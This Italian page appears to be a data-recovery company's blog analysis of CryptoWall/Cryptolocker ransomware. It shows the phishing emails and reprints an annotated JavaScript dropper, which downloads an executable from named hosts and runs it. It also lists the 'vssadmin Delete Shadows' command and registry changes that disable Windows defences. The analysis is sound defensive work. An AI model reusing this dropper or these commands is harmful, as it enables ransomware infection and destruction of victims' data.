Recovery Italia® può aiutarVi a risolvere con successo qualsiasi caso di perdita di dati.
preventivo immediatoRecovery Italia® può aiutarVi a risolvere con successo qualsiasi caso di perdita di dati.
preventivo immediatoI computer attaccati dal Virusl CryptoWall o Cryptolocker sono moltissimi i tutto il mondo, e la cosa imbarazzante è che è possibile trovare migliaia di forum di post sui blog con inutili informazioni scopiazzate senza alcuno che abbia perfezionato uno studio serio su questa piaga informatica, ma molto più grave è che nessuno sembra capire profondamente il significato di questo tipo di attacco nè viene intrapresa alcuna azione nè da enti governativi nè dai providers.
Cryptolocker è un eseguibile, lanciato sul computer vittima con notevoli caratteristiche di protezione anti disassemblaggio e anti rilevazione che in un modo molto astuto, crypta i nostri files con una chiave molto forte ( attualmente sembra andare di moda RSA 2048 ) le informazioni contenute ni files considerati di "valore"per poi chiedere il riscatto ( RANSOM ) a pagamento per riavere i propri files.
Nella maggior parte dei casi il virus si propaga utilizzando messaggi di posta elettronica più o meno "intelligenti", come fattura, immagine o come accade in questi giorni spacciandosi per una comunicazione di equitalia molto ben costruita, diversa dal solito phishing di fattura grossolana.
Questo significa prima di tutto che componenti di questa organizzazione criminale sono italiani, e noi abbiamo anche trovato su quale server, ma lo vedremo più tardi
Agente della Risossione
Equitalia S.p.A.
Via Cristoforo Colombo 269 - 00117 - Roma
Art. 30 D.P.R. 21/05/1972, n. 202 e successive modifiche - Art. 30 D.P.R. 21/05/1972, n. 600, Art. 190 c.p.c.
Gentile Sig./Sig.ra,
Il suindicato Agente della Riscossione avvisa, ai sensi delle intestate disposizioni di legge , di aver depositato in data odierna, nella Casa Comunale del Comune il seguente avviso di pagamento "Documento n.00020405064" del 05/12/2015 , composto da 2 pagina/e di elenchi contribuenti a nr. 12 atti.
SCARICA IL DOCUMENTO ALLEGATO
Š Equitalia S.p.A. C.F. P.I. 08704541005
FROM: Sofia Baritono
TO:
Data: 06 11 2015 19:33:00
Subject: Copia della fattura
Le email con il virus, molto spesso provengono da indirizzi "reali" a volte da nostri stessi interlocutori e sono molto "credibili", questo perchè i nostri amici pirati che inviano le email con il virus hanno acquistato milioni di indirizzi email validi, direttamente nell botnet degli hackers, quindi è addirittura facile imbattersi in un mittente conosciuto.
Il ransomware cryptowall o cryptolocker non puo' diffondersi nativamente come .exe, in quanto i providers di posta lo identificherebbero, anche se contenuto in uno zip, per cui hanno pensato un sistema molto più articolato ed astuto.
Nel File fattura.zip per esempio spesso viene inserito un piccolo file javascript, linguaggio utilizzato dal nostro browser camuffato da pdf o da doc.
Il contenuto puo' avere delle piccole differenze, ma nella sostanza una funzione ricorsiva offuscata e maliziosa genera una stringa con il vero codice
Esempio del contenuto del file fattura.pdf.js
var stringa;
function F(YuesnpFPlX,sIqefaiTYA,iKJZjGxUCz)
{
stringa = stringa + String.fromCharCode(YuesnpFPlX)+String.fromCharCode(sIqefaiTYA)+String.fromCharCode(iKJZjGxUCz);
return String.fromCharCode(YuesnpFPlX)+String.fromCharCode(sIqefaiTYA)+String.fromCharCode(iKJZjGxUCz)
}
La chiamata eval genera da un flusso complesso e apparentemente illeggibile il codice di secondo livello
eval(F(13,10,13)+F(10,118,97)+F(114,32,98)+F(32,61,32)+F(34,53,46)+F(51,57,46) + Molto altro codice dissimulatorio)
var b = "5.39.222.196/73.exe? bereanbibledenver.com/wp-admin/js/73.exe? bellychef.com/wp-includes/theme-compat/73.exe?".split(" ");
Con questo sistema il virus prova ad evitare eventuali rilevazioni del codice "malizioso"
var sdf =((1/*s147442280596n422484uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
Qui è stata occultata la chiamata essenziale per lanciare il virus come eseguibile
var ws = WScript.CreateObject(sdf);
var fd = "%TEMP%";
Qui viene identificata la cartella di windows temporanea
var fn = ws.ExpandEnvironmentStrings(fd);
var bim = "2.XMLH";
var poh = bim + "TTP";
Qui viene cyptolocker occulta la chiamata http
var as = true , sdfs = "ADOD";
var xo = WScript.CreateObject("MS"+"XML"+(261764, poh));
var xa = WScript.CreateObject(sdfs + "B.St"+(498822, "ream"));
var ld = 0;
var n = 1;
for (var i=ld; i
{
var dn = 0;
try {
poi = "GET";
Qui viene cyptolocker prova tutti gli indirizzi disponibili per il download del virus
xo.open(poi,"http://"+b[i]+n, false); xo.send(); if (xo.status == 100+100) {
xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 201000-1000) {
dn = 1; xa.position = 0; xa.saveToFile/*d813530s*/(fn/*d41380s*/+n+".exe",4-2); try {
if (((new Date())>0,7327516888))
{
ws./*d608145s*/Run(fn+n+/*d246178s*/".exe",/*d104822s*/3-2,0);
break;
}
}
catch (er) {
};
}; xa.close();
};
if (dn == 1) {
ld = i; break;
};
}
catch (er) {
};
};
Prima di ogni cosa, i pirati che hanno prodotto il virus sono molto astuti e cambiano continuamente server e metodo di offuscamento delle url da dove il virus verrà scaricato.
I siti web che ospitano il virus, sono distruibuiti in tutto il mondo ed anche in italia.
Abbiamo notato che molti di questi siti vengono posizionati su providers e server in lingua araba, russa o posizionati a PANAMA per esempio.
Durante le nostre analisi abbiamo trovato un redirect del virus anche su server italiani, nello specifico in Sardegna.
Non facciamo menzione del provider nè dei domini interessati, in quanto molto pericoloso e dobbiamo considerare l'ipotesi che il proprietario di un dominio attaccato potrebbe sempre essere inconsapevole, e quindi il pirata potrebbe essere il webmaster o qualcuno operante sui server del provider stesso, oltre che sarebbe opportuno considerare un eventuale attacco sul dominio in oggetto ( anche se l'ipotesi di hacking viene considerata remota ) .
Una volta che l'eseguibile del virus è stato trasferito sul vostro computer il funzionamento del virus è molto veloce ed incisivo.
Il Virusl CryptoWall prima di iniziare il lavoro prepara con cura il proprio ambiente di utilizzo, creando un nuovo processo explorer sospeso ed inserisce codice malizioso nel processo stesso.
Crea dunque un nuovo thread remoto ed esegue la chiamata NtResumeThread
Il virus Perfeziona il downgrade del sistema di sicurezza di Windows ed esegue la patch su RtlQueryElevationFlags.
Se ancora trovate qualche blogger improvvisato che nel proprio copia / incolla suggerisce di provare a recuperare i dati utilizzando le copie shadow, sappiate che CrytoWall prima di qualsiasi altra operazione le elimina con la chiamata WinExec( vssadmin.exe Delete Shadows /All /Quiet )
Disabilitando questi servizi CryptoWall è certo di poter operare con tranquillità senza problemi, il Vostro sistema Windows adesso è completamente indifeso.
Il virus elimina la chiave per lo startup di Defender alla partenza del computer
HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run.Windows Defender
Il virus elimina la chiave di registro per le notifiche di sicurezza
HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/ShellServiceObjects/{FD6905CE-952F-41F1-9A6F-135D9C6622CC}
e disabilita il ripristino di Windows per chiudere in bellezza
HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/SystemRestore.DisableSR = 1
Nel prossimo post sul nostro blog vedremo come il Virus eseguirà il codice proncipale del proprio funzionamento, la cifratura dei Vostri Dati
Per qualsiasi informazione scriveteci virus@recoveritalia.it
Ti è mai capitato di cancellare un file importante per errore e poi disperarti perché pensavi fosse andato perduto in modo irreversibile? Niente panico! Sei atterrato nel post giusto. In questa guida, ti mostreremo come recuperare quei preziosi documenti che avevi rimosso accidentalmente senza bisogno di essere un mago del computer o ricorrere a costosi servizi professionali.
Nel contesto aziendale, la protezione dei dati sensibili rappresenta una priorità fondamentale per preservare l'integrità e la competitività delle aziende. Non tutti sanno però che i computer possono essere soggetti a perizie forensi e che le prove raccolte possono avere valenza probatoria anche in caso di spionaggio industriale e conflitti lavorativi.
Un problema che può capitare a chiunque: ad un tratto l’hard disk esterno che colleghiamo abitualmente al nostro pc non viene più riconosciuto dal sistema e quindi i dati diventano inaccessibili. Questa situazione è particolarmente problematica in quanto potreste perdere tutte le informazioni memorizzate sul vostro dispositivo esterno e risulta molto importante sapere come procedere per recup
Una delle maggiori preoccupazioni da parte dei proprietari di un iPhone è quella di perdere i dati personali, soprattutto quando a essere colpita da un danno è la scheda madre. Il deterioramento della scheda madre non solo limita l’accesso alle informazioni contenute nell’iPhone, ma costituisce anche una sfida considerevole per chi si occupa di recupero dati.
Recovery Italia si occupa di procedure di recupero dati professionale da qualsiasi dispositivo di memoria, con qualsiasi sistema operativo. Grazie alle tecnologie e alle conoscenze sviluppate nell esperienza pluriennale, lo Staff puo intervenire e risolvere la stragrande maggioranza dei casi di perdita dati, per cancellazione, danneggiamento, formattazione o sabotaggio
Grazie alla Camera Bianca professionale Recovery Italia tratta e risolve qualsiasi situazione in cui si sono persi i dati da un hard disk.
Il tuo hard disk è danneggiato? Hai cancellato accidentalmente i dati e non hai un backup? Noi di Recovery Italia possiamo aiutarti a recuperarli con successo!
Le strumentazioni tecniche di cui è dotato il nostro laboratorio, e gli
Recovery Italia puo affrontare casi di recupero dati danneggiati da qualsiasi Virus e Malware. Interventi per il recupero dei dati attaccati da qualsiasi Virus, anche da memorie formattate in seguito all attacco del Virus. Possiamo recuperare dati criptati o codificati da Virus e Malware, dati bloccati, dati a cui e stata modificata l estensione e qualsiasi altra tipologia di attacco
In questa pagina vi mostriamo la schermata originale del virus ACCDFISA 2.0
AIRA una delle ultimissime versioni di Cryptolocker, il virus che cripta i file che sta diventanto l incubo di tutti gli utenti vista la pericolosit nonch quando sia semplice esserne infettati. Come promettevano gi le precedenti versioni che sono state davvero prodotte alla velocit della luce e in maniera massiva, anche l ultima versione di Cryptolocker, AIRA, non da meno e non delud
Qualsiasi hard disk, anche quello che sembra più affidabile e di qualitá può tradirci improvvisamente. Recovery Italia è specializzata nel recupero dei dati da hard disk e memorie esterne con qualsiasi tipo di danneggiamento e perdita di dati, dalle formattazioni accidentali, ad eventi naturali o errori umani come le cadute a terra.
dettagliGli Hard Disk Esterni dominano il mercato dello storage consumer.Chiunque ha una memoria esterna dove salva Foto Video e Film. La portabilit dei drive esterni li espone a rischio di shock fisici e cadute a terra.
dettagliRecovery Italia interviene su tutti i livelli o configurazioni di Raid, in qualsiasi caso di perdita dei dati, anche quando l”array presenti numerose unitá degradate o in fault.I nostri ingegneri sono in grado di intervenire su qualsiasi tipo di assemblaggio RAID come RAID 0, RAID 1, RAID 3, RAID 5, RAID 6 oltre raid proprietari e configurazioni ibride.
dettagliRecovery Italia può recuperare dati da sistemi NAS (Netword Attached Storage) di qualsiasi produttore, e con qualsiasi tipo di danneggiamento. Il NAS é un sistema che puó essere dotato di una o più unita disco, generalmente usato per la condivisione di documenti,file ed elementi multimediali tra diverse postazioni di lavoro collegate in rete.
dettagli
Sedi Operative
Procedura recupero dati
Richiesta Pickup
Richiesta Assistenza
Listino Prezzi
Preventivo ON LINE
Contatto
Privacy Policy
Hard Disk Drive
Hard Disk USB
Pen Drive USB
Enterprise Servers
Sistemi RAID
NAS & DAS
Cellulari e Smartphone
Mobile Data Rescue
WhatsApp Data Recovery
iPhone Data Recovery
Challenger Rocket
Challenger PCI Board
DATA RECOVERY SERVICE SRL
Via del Fosso Centroni, 4 Roma (RM)
PIVA.: 14931361001
Via del fosso centroni, 4
00118 ROMA
Call Center 39 06 98357672
Email: info@recoveryitalia.it
Via Attilio Regolo 19
00192 ROMA
Call Center 39 06 98357672
Email: info@recoveryitalia.it
Via Santa Maria Valle, 3
21220 Milano
Call Center 39 02 00611518
Email: info@recoveryitalia.it